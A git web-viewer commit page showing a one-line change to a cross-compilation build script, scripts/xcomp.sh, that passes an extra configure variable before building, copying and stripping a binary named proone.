aboutsummaryrefslogtreecommitdiff
path: root/scripts
diff options
context:
space:
mode:
authorDavid Timber <mieabby@gmail.com>2020-01-01 08:47:51 +1100
committerDavid Timber <mieabby@gmail.com>2020-01-01 08:47:51 +1100
commit6e456edb2757cf9d28d306afb836aa16780fb912 (patch)
tree2744c874583f03d70ef2aaeb405c74fb5b65ff75 /scripts
parent85d78af0cd8b809abc28491c46c648a242053044 (diff)
checkpoint
Diffstat (limited to 'scripts')
-rwxr-xr-xscripts/xcomp.sh2
1 files changed, 1 insertions, 1 deletions
diff --git a/scripts/xcomp.sh b/scripts/xcomp.sh
index 2ff24a5..8790696 100755
--- a/scripts/xcomp.sh
+++ b/scripts/xcomp.sh
@@ -1,7 +1,7 @@
#!/bin/bash
OUT="$PROONE_BIN_PREFIX.$PROONE_BIN_ARCH"
-./configure --host="$PROONE_HOST" &&\
+./configure --host="$PROONE_HOST" $PROONE_AM_CONF &&\
make -j$(nproc) &&\
cp -a src/proone "$OUT" &&\
"$PROONE_HOST-strip" -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr "$OUT" &&\